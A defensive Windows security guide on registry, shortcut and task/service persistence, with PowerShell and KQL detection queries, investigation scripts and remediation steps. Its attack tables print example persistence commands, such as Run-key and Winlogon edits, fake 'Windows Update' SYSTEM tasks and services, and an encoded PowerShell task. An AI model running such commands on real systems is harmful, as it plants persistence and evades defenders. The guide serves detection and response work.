# part 3

## 🚨 **Modify Registry**

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Registry Modification?**

* The **Windows Registry** is a hierarchical database used to store **system settings, application configurations, and user preferences**.
* **Attackers often modify the registry** to:
  * **Establish Persistence:** Ensure malware executes at startup.
  * **Disable Security Controls:** Turn off antivirus or logging.
  * **Configure Malware Behavior:** Adjust system or application settings for malicious purposes.
  * **Hide Artifacts:** Conceal malicious files or processes.

***

#### 📑 **Why Do Attackers Use Registry Modifications?**

* **Persistence:** Malware can auto-start on system boot.
* **Stealth:** Changes are often hard to detect without monitoring.
* **Control:** Modify system behavior for exploitation.
* **Fileless Attacks:** Execute scripts directly from the registry.

#### 📌 **Common Registry Keys Abused by Attackers**

| **Key**                                                            | **Purpose**                    | **Example Command**                                                               |
| ------------------------------------------------------------------ | ------------------------------ | --------------------------------------------------------------------------------- |
| `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`               | Persistence via user login     | `reg add "HKCU\...\Run" /v Malware /t REG_SZ /d "C:\malicious.exe"`               |
| `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell` | Replace shell for persistence  | `reg add "HKLM\...\Winlogon" /v Shell /t REG_SZ /d "explorer.exe, malicious.exe"` |
| `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`   | Disable Task Manager           | `reg add "HKCU\...\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1`          |
| `HKLM\SYSTEM\CurrentControlSet\Services`                           | Modify service behavior        | `reg add "HKLM\...\Services" /v ImagePath /t REG_EXPAND_SZ /d "C:\malicious.exe"` |
| `HKCU\Software\Classes\mscfile\shell\open\command`                 | Hijack MSC files for execution | `reg add "HKCU\...\open\command" /d "malicious.exe"`                              |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Detection via PowerShell**

**🕵️ List Startup Entries in Registry:**

```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
```

**🕵️ Search for Suspicious Keys:**

```powershell
Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Recurse
Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
```

**🕵️ Check Disabled Security Settings:**

```powershell
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" | Select-Object DisableAntiSpyware
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Registry Modifications:**

```kusto
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "Run" or RegistryKey contains "Winlogon"
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, AccountName
```

**🕵️ Identify Security Settings Disabled:**

```kusto
DeviceRegistryEvents
| where RegistryKey contains "Windows Defender"
| where RegistryValueName in ("DisableAntiSpyware", "DisableRealtimeMonitoring")
| where RegistryValueData == "1"
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData
```

**🕵️ Persistence via Registry:**

```kusto
DeviceRegistryEvents
| where RegistryKey contains "Run" or RegistryKey contains "RunOnce"
| where RegistryValueData contains ".exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
```

**🕵️ Look for Fileless Execution:**

```kusto
DeviceRegistryEvents
| where RegistryValueData contains "powershell" or RegistryValueData contains "cmd.exe"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
```

**🕵️ Track Registry Key Creation:**

```kusto
DeviceRegistryEvents
| where ActionType == "RegistryKeyCreated"
| where RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
| project Timestamp, DeviceName, RegistryKey, AccountName
```

***

#### 📊 **Event Viewer Logs**

* **Event ID 4657:** Registry Value Modification
* **Event ID 4663:** Object Access Attempt
* **Event ID 4688:** Process Creation

**📌 Focus on These Indicators:**

* **Processes Making Changes:** `powershell.exe`, `cmd.exe`, `reg.exe`, `regedit.exe`
* **Suspicious Paths:** `HKCU:\...\Run`, `HKLM:\...\Winlogon`, `HKCU:\...\Policies`
* **New or Modified Keys:** Look for `.exe`, `.bat`, `.vbs` references in key values.

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Identify Processes Making Registry Changes**

```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4657} | Select-Object TimeCreated, Message
```

***

#### 2️⃣ **Trace Suspicious Registry Values**

* Investigate recent changes in critical registry paths:

```powershell
# Run keys store autostart entries as values, not subkeys, so enumerate the values of the key itself
$key = Get-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
$key.GetValueNames() | ForEach-Object { [pscustomobject]@{ Name = $_; Value = $key.GetValue($_) } }
```

***

#### 3️⃣ **Look for Fileless Malware**

* Check registry keys for encoded scripts:

```powershell
# Registry keys have no .Value property; enumerate each key's values and match on their data
Get-ChildItem -Path "HKCU:\Software" -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    $key = $_
    foreach ($name in $key.GetValueNames()) {
        $data = [string]$key.GetValue($name)
        if ($data -match 'powershell|cmd\.exe') { [pscustomobject]@{ Key = $key.Name; Value = $name; Data = $data } }
    }
}
```

***

#### 4️⃣ **Correlate with Process Execution**

* Cross-reference with processes using **Event ID 4688**.
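
Pulling the same 4657 data as structured fields, as an added example that is not part of the original page: the function below reads the account, process, key, value name and old/new data from the event XML, keeps only changes under autostart and security-policy paths, and flags new values that point at script hosts, encoded commands or user-writable locations. It assumes "Audit Registry" is enabled and a SACL exists on the keys (without both, 4657 is never written); the path and pattern lists are this example's own.

```powershell
# Added example, not from the original page: structured triage of Security 4657 events.
# Assumes "Audit Registry" is enabled and a SACL exists on the keys; without both, 4657 is never logged.
function Get-SuspiciousRegistryChange {
    param(
        [int]$Hours = 24,
        [string]$LogName = 'Security'
    )
    # Key paths worth alerting on; 4657 ObjectName uses the \REGISTRY\MACHINE\... form, so match on the tail
    $sensitive = 'CurrentVersion\\Run', 'Winlogon', 'Policies\\System', 'CurrentControlSet\\Services', 'Windows Defender'
    # Value data that points at script hosts, encoded commands or user-writable locations
    $flagged = 'powershell', 'cmd\.exe', 'mshta', 'wscript', 'cscript', 'rundll32', 'regsvr32',
               '-enc', 'FromBase64String', '\\Temp\\', '\\AppData\\', '\\ProgramData\\'

    $filter = @{ LogName = $LogName; Id = 4657; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # EventData is a list of <Data Name="...">value</Data>; turn it into a lookup table
        $d = @{}
        foreach ($node in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$node.Name] = $node.'#text' }

        $path = $d['ObjectName']
        if (-not ($sensitive | Where-Object { $path -match $_ })) { return }

        $hits = $flagged | Where-Object { $d['NewValue'] -match $_ }
        [pscustomobject]@{
            Time       = $_.TimeCreated
            User       = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Process    = $d['ProcessName']
            Key        = $path
            ValueName  = $d['ObjectValueName']
            OldValue   = $d['OldValue']
            NewValue   = $d['NewValue']
            Suspicious = [bool]$hits
            Reason     = ($hits -join ', ')
        }
    }
}

# Flagged changes first; the rest of the sensitive-path changes follow for context
Get-SuspiciousRegistryChange -Hours 72 | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

The Process column is what the page's step 4 needs for the 4688 cross-reference: it is the image path of the process that wrote the value.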

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Identify and Remove Malicious Registry Keys**

```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousKey"
```

#### 📌 **2. Restore Default Security Settings**

```powershell
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```

#### 📌 **3. Terminate Related Processes**

```powershell
Stop-Process -Name "powershell" -Force
```

#### 📌 **4. Quarantine Malicious Files**

```powershell
Move-Item -Path "C:\Temp\malicious.exe" -Destination "C:\Quarantine"
```

#### 📌 **5. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Registry Auditing:**
   * Configure auditing for sensitive registry paths.
2. **Use Attack Surface Reduction (ASR) Rules:**

```powershell
# D4F940AB-401B-4EFC-AADC-AD5F3C50688A = "Block all Office applications from creating child processes"
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
```

3. **Disable Unused Registry Tools:**
   * Restrict access to `reg.exe` and `regedit.exe` for non-admin users.
4. **Enable Tamper Protection in Defender:**

```powershell
# Set-MpPreference has no Tamper Protection parameter; enable it in the Windows Security app
# (Virus & threat protection settings) or through Intune / the Defender portal, then verify:
Get-MpComputerStatus | Select-Object IsTamperProtected
```

5. **Educate Users:**
   * Train users to recognize social engineering attacks leading to registry modifications.

***

### 🧠 **6. Key Takeaways**

* **Persistence is Key:** Monitor startup and Winlogon registry keys.
* **Disable Known Attack Paths:** Prevent scripts from running via registry.
* **Real-Time Alerts:** Monitor changes to sensitive keys (`Run`, `Winlogon`).
* **Registry Auditing:** Enable Event IDs **4657**, **4688**, and **4663**.

***

## 🚨 **Boot or Logon Autostart Execution: Shortcut Modification**

### 🔍 **1. Attack Breakdown**

#### 📝 **What Is a Shortcut Modification Attack?**

* **Shortcut Modification** involves altering **Windows shortcut files (.lnk)** to execute malicious commands or scripts during **boot** or **user logon**.
* Attackers modify shortcut targets to execute **malicious payloads** instead of their original programs.

#### 📑 **Why Do Attackers Use Shortcut Modification?**

* **Persistence:** Ensures malicious code runs at every system boot or user logon.
* **Stealth:** Modified shortcuts appear legitimate to unsuspecting users.
* **Execution Without Alerts:** Often bypasses security tools that monitor startup keys.
* **User Trust:** Users are more likely to trust familiar application shortcuts.

***

#### 📌 **Common Shortcut Modification Techniques**

| **Technique**                   | **Example Command**                                                                                                    | **Purpose**                                              |
| ------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------- |
| **Startup Folder Modification** | `echo [malicious command] > C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\example.lnk` | Run malware at user logon                                |
| **Modify Desktop Shortcuts**    | `powershell -Command "Start-Process calc.exe"`                                                                         | Replace target of a common shortcut                      |
| **Modify Taskbar Shortcuts**    | `C:\Windows\System32\cmd.exe /c malicious.exe`                                                                         | Hijack taskbar or pinned shortcut                        |
| **LNK File Injection**          | `copy malicious.lnk C:\Users\<User>\Start Menu\Programs\Startup\`                                                      | Inject malicious shortcut                                |
| **Path Hijacking via Shortcut** | `C:\Windows\System32\cmd.exe /k "C:\Temp\payload.exe"`                                                                 | Execute malicious binary instead of the original program |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection**

**🕵️ Check Startup Folder for Suspicious Shortcuts:**

```powershell
Get-ChildItem -Path "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -Filter "*.lnk" | Select-Object Name, LastWriteTime
```

**🕵️ Check Shortcut Target Paths:**

```powershell
# FileInfo objects have no TargetPath; resolve the .lnk through the WScript.Shell COM object
(New-Object -ComObject WScript.Shell).CreateShortcut("C:\Users\<User>\Desktop\example.lnk").TargetPath
```

**🕵️ Check for Suspicious Commands in Shortcuts:**

```powershell
# Arguments are likewise read from the parsed shortcut, not from the file object
(New-Object -ComObject WScript.Shell).CreateShortcut("C:\Users\<User>\Desktop\example.lnk").Arguments
```

**🕵️ Identify Modified Shortcuts:**

```powershell
Get-ChildItem -Path "C:\Users\*\Desktop" -Filter "*.lnk" | Select-Object Name, LastWriteTime
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Shortcut Modifications in Startup Folders:**

```kusto
DeviceFileEvents
| where FolderPath contains "Startup"
| where FileName endswith ".lnk"
| where ActionType in ("FileCreated", "FileModified")
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessFileName, AccountName
```

**🕵️ Identify Suspicious Shortcut Arguments:**

```kusto
DeviceFileEvents
| where FileName endswith ".lnk"
| where InitiatingProcessCommandLine contains "cmd.exe" or InitiatingProcessCommandLine contains "powershell.exe"
| project Timestamp, DeviceName, FileName, InitiatingProcessCommandLine, AccountName
```

**🕵️ Monitor Common Hijacked Paths:**

```kusto
DeviceFileEvents
| where FolderPath contains "Desktop" or FolderPath contains "Start Menu"
| where FileName endswith ".lnk"
| where InitiatingProcessFileName in ("cmd.exe", "powershell.exe")
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine, AccountName
```

**🕵️ Check Persistence via Modified Shortcuts:**

```kusto
DeviceRegistryEvents
| where RegistryKey contains "Run"
| where RegistryValueData contains ".lnk"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
```

***

#### 📊 **Event Viewer Logs**

* **Event ID 4663:** Object Access Attempt
* **Event ID 4688:** Process Creation
* **Event ID 4670:** Permissions on an Object Were Changed

**🕵️ Filter Suspicious Activities in Event Viewer:**

* Open **Event Viewer → Security → Filter by Event ID 4688**
* Look for:
  * **Process Command Line:** references to `.lnk` files (populated only when the "Include command line in process creation events" policy is on)
  * **New Process Name / Creator Process Name:** `cmd.exe`, `powershell.exe`

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Analyze Shortcut Target Paths**

```powershell
# Resolve the shortcut with WScript.Shell; Get-Item alone exposes no TargetPath
(New-Object -ComObject WScript.Shell).CreateShortcut("C:\Users\<User>\Desktop\suspicious.lnk").TargetPath
```

#### 2️⃣ **Trace Parent Processes**

* Check what triggered the creation or modification of the shortcut:

```powershell
# Escape the dot so the pattern matches the .lnk extension rather than any character followed by "lnk"
Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -match '\.lnk' } | Select-Object ProcessId, ParentProcessId, Name, CommandLine
```

#### 3️⃣ **Check for Suspicious Files in Startup Folders**

```powershell
Get-ChildItem -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -Filter "*.lnk"
```

#### 4️⃣ **Review Recently Modified Shortcuts**

* Check recent changes in shortcut files:

```powershell
Get-ChildItem -Path "C:\Users\*\Desktop" -Filter "*.lnk" | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
```

#### 5️⃣ **Inspect Registry Keys**

* Look for `.lnk` references in **Run** keys:

```powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
```
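
Steps 1, 3 and 4 above can be combined into one sweep. The function below is an added example, not code from the original page: it resolves the real target and arguments of every recently modified `.lnk` in the Startup folders, Start Menu, Desktops and pinned taskbar via the WScript.Shell COM object, and flags shortcuts whose target is a script host, whose arguments look encoded or hidden, whose target lives in a user-writable path or is missing, or whose icon is borrowed from a different executable. The folder list, patterns and 30-day window are this example's assumptions.

```powershell
# Added example, not from the original page: resolve what every recent .lnk really launches and
# flag the classic tells. Folder list, patterns and the 30-day window are this example's assumptions.
function Get-SuspiciousShortcut {
    param([int]$ModifiedWithinDays = 30)

    # Programs is recursed, so it covers each user's Startup folder as well
    $folders = @(
        "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
        'C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs',
        'C:\Users\*\Desktop',
        'C:\Users\*\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar'
    )
    $scriptHosts = 'cmd\.exe$', 'powershell\.exe$', 'pwsh\.exe$', 'mshta\.exe$', 'wscript\.exe$', 'cscript\.exe$', 'rundll32\.exe$', 'regsvr32\.exe$'
    $argPatterns = '-enc', '-e ', 'FromBase64String', '-w hidden', 'WindowStyle', 'IEX', 'Invoke-Expression', 'DownloadString', '/c ', '/k '
    $userPaths   = '\\Temp\\', '\\AppData\\', '\\ProgramData\\', '\\Downloads\\', '\\Public\\'

    $shell = New-Object -ComObject WScript.Shell
    $since = (Get-Date).AddDays(-$ModifiedWithinDays)

    Get-ChildItem -Path $folders -Filter '*.lnk' -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $since } |
        ForEach-Object {
            $lnk       = $shell.CreateShortcut($_.FullName)   # parses the .lnk, does not launch it
            $target    = [Environment]::ExpandEnvironmentVariables([string]$lnk.TargetPath)
            $arguments = [string]$lnk.Arguments
            $iconFile  = [Environment]::ExpandEnvironmentVariables(([string]$lnk.IconLocation -split ',')[0])
            $reasons   = @()
            if ($scriptHosts | Where-Object { $target -match $_ })    { $reasons += 'target is a script host' }
            if ($argPatterns | Where-Object { $arguments -match $_ }) { $reasons += 'suspicious arguments' }
            if ($userPaths   | Where-Object { $target -match $_ })    { $reasons += 'target in user-writable path' }
            if ($target -and -not (Test-Path -LiteralPath $target))   { $reasons += 'target missing on disk' }
            # An icon borrowed from one program while the target is another is a common lookalike trick
            if ($iconFile -match '\.exe$' -and $target -and $iconFile -ne $target) { $reasons += 'icon/target mismatch' }

            [pscustomobject]@{
                Shortcut   = $_.FullName
                Modified   = $_.LastWriteTime
                Target     = $target
                Arguments  = $arguments
                Suspicious = [bool]$reasons
                Reason     = ($reasons -join '; ')
            }
        }
}

# Only the flagged ones; drop the Where-Object to review every recent shortcut
Get-SuspiciousShortcut -ModifiedWithinDays 7 | Where-Object Suspicious | Format-List
```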

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Remove Malicious Shortcuts**

```powershell
Remove-Item -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suspicious.lnk"
```

#### 📌 **2. Quarantine Malicious Payloads**

```powershell
Move-Item -Path "C:\Temp\malware.exe" -Destination "C:\Quarantine"
```

#### 📌 **3. Remove Registry Persistence**

```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousKey"
```

#### 📌 **4. Terminate Malicious Processes**

```powershell
Stop-Process -Name "cmd" -Force
Stop-Process -Name "powershell" -Force
```

#### 📌 **5. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Attack Surface Reduction (ASR) Rules:**

```powershell
# D4F940AB-401B-4EFC-AADC-AD5F3C50688A = "Block all Office applications from creating child processes"
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
```

2. **Restrict Write Access to Startup Folders:**

* Limit permissions on `C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`.

3. **Audit Shortcut Modifications:**

* Enable auditing for `.lnk` file changes.

4. **Disable Auto-Execution from Startup Folder:**

* Block execution of scripts from `Startup` via **Group Policy**.

5. **Educate Users:**

* Train users to avoid clicking on `.lnk` files from untrusted sources.

***

### 🧠 **6. Key Takeaways**

* **Monitor Shortcut Modifications:** Watch `.lnk` files in `Startup` and `Desktop`.
* **Audit Key Paths:** Regularly review `Startup` and `Run` registry keys.
* **Analyze Shortcut Targets:** Investigate modified `.lnk` file targets.
* **Focus on Persistence Mechanisms:** Pay attention to `cmd.exe`, `powershell.exe`, and suspicious arguments.

***

## 🚨 **Masquerade Task or Service**

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Task or Service Masquerading?**

* **Masquerading** occurs when an attacker **disguises a malicious scheduled task or Windows service** to appear **legitimate**.
* Attackers often name tasks or services similar to **system processes** (e.g., `svchost.exe`, `explorer.exe`) to avoid detection.

#### 📑 **Why Do Attackers Use Task or Service Masquerading?**

* **Persistence:** Ensures malware or malicious scripts run automatically on startup.
* **Stealth:** Mimics legitimate services or tasks to evade detection.
* **Privilege Escalation:** May run tasks/services with elevated privileges.
* **Reduces Suspicion:** Security teams might overlook familiar-looking names.

***

#### 📌 **Common Techniques**

| **Technique**                             | **Example Command**                                                                           | **Purpose**                          |
| ----------------------------------------- | --------------------------------------------------------------------------------------------- | ------------------------------------ |
| **Scheduled Task Masquerade**             | `schtasks /create /tn "Windows Update" /tr C:\Temp\malware.exe /sc daily /ru SYSTEM`          | Create a disguised scheduled task    |
| **Service Creation with Masquerade Name** | `sc create WindowsUpdate type= own start= auto binPath= "C:\Temp\malware.exe"`                | Create a fake Windows Update service |
| **Modify Existing Services**              | `sc config TrustedInstaller binPath= "C:\Temp\malware.exe"`                                   | Hijack legitimate services           |
| **Hidden Tasks**                          | `schtasks /create /tn "Windows Security" /tr powershell.exe -enc ZWNobyBoZWxsbyA= /sc minute` | Create hidden tasks                  |
| **Fake Parent Process**                   | `cmd.exe /c start svchost.exe -k netsvcs`                                                     | Mimic a legitimate process           |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection**

**🕵️ List Scheduled Tasks**

```powershell
Get-ScheduledTask | Where-Object { $_.TaskPath -like "*Windows*" } | Select-Object TaskName, TaskPath, State
```

**🕵️ Inspect Task Command Lines**

```powershell
# Get-ScheduledTaskInfo only reports run times and results; the command line lives in the task's Actions
(Get-ScheduledTask -TaskName "Windows Update").Actions | Select-Object Execute, Arguments, WorkingDirectory
```

**🕵️ List All Windows Services**

```powershell
Get-Service | Where-Object { $_.StartType -eq "Automatic" } | Select-Object Name, DisplayName, StartType, Status
```

**🕵️ Inspect Service Configurations**

```powershell
Get-CimInstance Win32_Service | Select-Object Name, DisplayName, PathName, StartMode
```

**🕵️ Find Unusual Paths in Service Binaries**

```powershell
Get-CimInstance Win32_Service | Where-Object { $_.PathName -notlike "*system32*" } | Select-Object Name, PathName
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect Suspicious Scheduled Tasks**

```kusto
DeviceProcessEvents
| where FileName == "schtasks.exe"
| where ProcessCommandLine contains "/create"
| where ProcessCommandLine contains "Windows Update" or ProcessCommandLine contains "Security"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Identify Suspicious Services Created or Modified**

```kusto
DeviceProcessEvents
| where FileName == "sc.exe"
| where ProcessCommandLine contains "create" or ProcessCommandLine contains "config"
| where ProcessCommandLine contains "svchost" or ProcessCommandLine contains "update"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Find Services with Non-Standard Binary Paths**

```kusto
DeviceRegistryEvents
| where RegistryKey contains "SYSTEM\\CurrentControlSet\\Services"
| where RegistryValueData !contains "C:\\Windows\\System32"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, AccountName
```

**🕵️ Look for Tasks Executing from Suspicious Paths**

```kusto
DeviceFileEvents
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| where FileName endswith ".exe"
| project Timestamp, DeviceName, FolderPath, FileName, InitiatingProcessCommandLine
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                           |
| ------------ | ----------------------------------------- |
| **4697**     | A service was installed in the system     |
| **4698**     | A scheduled task was created              |
| **4702**     | A scheduled task was updated              |
| **7045**     | A new service was installed on the system |

**📌 Focus on These Indicators:**

* **Service Name:** Generic or misleading names (`WindowsUpdate`, `SecurityService`)
* **Scheduled Task Names:** Mimic system tasks (`Windows Defender Update`, `Security Scan`)
* **Paths:** Non-standard paths like `C:\Temp\malware.exe`

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Review Scheduled Task Details**

* Inspect task triggers and command lines:

```powershell
schtasks /query /tn "Windows Update" /v /fo LIST
```

#### 2️⃣ **Inspect Service Binary Paths**

* Verify the service path and startup type:

```powershell
sc qc WindowsUpdate
```

#### 3️⃣ **Trace Parent Processes**

* Identify the parent process for suspicious tasks:

```powershell
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }
```

#### 4️⃣ **Validate File Hashes**

* Check binaries used by tasks and services:

```powershell
Get-FileHash "C:\Temp\malware.exe"
```

#### 5️⃣ **Check Registry for Service Entries**

* Review suspicious registry keys:

```powershell
reg query "HKLM\SYSTEM\CurrentControlSet\Services"
```
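
The five checks above, run as one pass over all tasks and auto-start services, as an added example that is not code from the original page: it keeps entries whose names borrow Windows, Microsoft, Update, Security or system-process wording, extracts the executable from each action or ImagePath, and reports those whose binary sits outside the Windows or Program Files trees, is missing, or does not carry a valid Microsoft Authenticode signature. The name patterns and trusted roots are this example's assumptions and will need tuning for third-party software.

```powershell
# Added example, not from the original page: find tasks and services that borrow Microsoft-sounding
# names but run binaries from untrusted locations or without a Microsoft signature.
function Get-MasqueradingTaskOrService {
    $lookalike    = 'Windows', 'Microsoft', 'Update', 'Security', 'Defender', 'svchost', 'explorer', 'TrustedInstaller'
    $trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

    # Pull the executable out of a command line: a quoted path, else the first token ending in .exe
    function Get-BinaryPath([string]$cmd) {
        if (-not $cmd) { return $null }
        $exe = if ($cmd -match '^\s*"([^"]+)"') { $Matches[1] }
               elseif ($cmd -match '^\s*(\S+?\.exe)') { $Matches[1] }
               else { ($cmd -split '\s+')[0] }
        [Environment]::ExpandEnvironmentVariables($exe)
    }

    function Test-Binary([string]$exe) {
        $reasons = @()
        if (-not ($trustedRoots | Where-Object { $exe -like "$_\*" })) { $reasons += 'binary outside Windows/Program Files' }
        if ($exe -and (Test-Path -LiteralPath $exe)) {
            $sig = Get-AuthenticodeSignature -LiteralPath $exe
            if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notlike '*Microsoft*') {
                $reasons += "not Microsoft-signed (status: $($sig.Status))"
            }
        } else { $reasons += 'binary not found on disk' }
        $reasons
    }

    # Tasks: a Microsoft-sounding name outside the \Microsoft\ task folder is the first smell
    Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | ForEach-Object {
        $task = $_
        if (-not ($lookalike | Where-Object { $task.TaskName -match $_ })) { return }
        foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
            $exe = Get-BinaryPath $action.Execute
            $reasons = Test-Binary $exe
            if ($reasons) {
                [pscustomobject]@{ Type = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"; RunAs = $task.Principal.UserId
                                   Binary = $exe; Arguments = $action.Arguments; Reason = ($reasons -join '; ') }
            }
        }
    }

    # Services: same check on the ImagePath, automatic-start services only
    Get-CimInstance Win32_Service | Where-Object { $_.StartMode -eq 'Auto' } | ForEach-Object {
        $svc = $_
        if (-not ($lookalike | Where-Object { $svc.Name -match $_ -or $svc.DisplayName -match $_ })) { return }
        $exe = Get-BinaryPath $svc.PathName
        $reasons = Test-Binary $exe
        if ($reasons) {
            [pscustomobject]@{ Type = 'Service'; Name = "$($svc.Name) ($($svc.DisplayName))"; RunAs = $svc.StartName
                               Binary = $exe; Arguments = $null; Reason = ($reasons -join '; ') }
        }
    }
}

Get-MasqueradingTaskOrService | Format-Table -AutoSize -Wrap
```

Every hit is a review item, not a verdict: legitimately signed third-party updaters will appear because they are not Microsoft-signed, which is exactly the comparison a masquerading `WindowsUpdate` service fails.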

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Disable and Remove Malicious Tasks**

```powershell
schtasks /delete /tn "Windows Update" /f
```

#### 📌 **2. Stop and Delete Malicious Services**

```powershell
sc stop WindowsUpdate
sc delete WindowsUpdate
```

#### 📌 **3. Remove Registry Entries**

```powershell
# Service keys usually carry subkeys (Parameters, Security), so -Recurse is needed for the delete to succeed
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WindowsUpdate" -Recurse -Force
```

#### 📌 **4. Quarantine Malicious Files**

```powershell
Move-Item -Path "C:\Temp\malware.exe" -Destination "C:\Quarantine"
```

#### 📌 **5. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Task and Service Auditing:**
   * Enable **Event IDs 4697, 4698, 4702, and 7045**.
2. **Restrict Service and Task Creation:**
   * Use **Group Policy** to limit non-admin task and service creation.
3. **Monitor Common Abuse Binaries:**
   * Tools like `schtasks.exe`, `sc.exe`, and `powershell.exe`.
4. **Enable Attack Surface Reduction (ASR) Rules:**

```powershell
# D4F940AB-401B-4EFC-AADC-AD5F3C50688A = "Block all Office applications from creating child processes"
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
```

5. **Audit Non-Standard Paths:**
   * Services running from `C:\Temp`, `C:\Users`, or `C:\ProgramData`.
6. **Implement Least Privilege Access:**
   * Restrict administrative privileges for regular users.
7. **Educate Users:**
   * Train users to recognize suspicious behavior and report anomalies.

***

### 🧠 **6. Key Takeaways**

* **Persistence Tactics:** Scheduled tasks and services are common attack vectors.
* **Mimicry is Key:** Attackers use misleading names to avoid detection.
* **Auditing is Essential:** Monitor task and service creations using Event Logs and Defender telemetry.
* **Focus on Execution Paths:** Legitimate tasks and services rarely use `Temp` or `AppData`.

***

## 🚨 **Indicator Removal on Host: Advanced Threat Analysis**

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Indicator Removal on Host?**

* **Indicator Removal on Host** is an adversarial tactic used to **erase traces of malicious activity** from a compromised system.
* Attackers remove **logs, files, registry entries, scheduled tasks, and artifacts** that could reveal their presence or actions.

#### 📑 **Why Do Attackers Remove Indicators?**

* **Evade Detection:** Hide traces of malicious activity from security teams and tools.
* **Persistence:** Make it harder for incident responders to fully remediate the breach.
* **Delay Investigation:** Obscure root cause analysis and delay detection timelines.
* **Cover Tracks:** Prevent linking the attacker to the activity.

***

#### 📌 **Common Techniques for Indicator Removal**

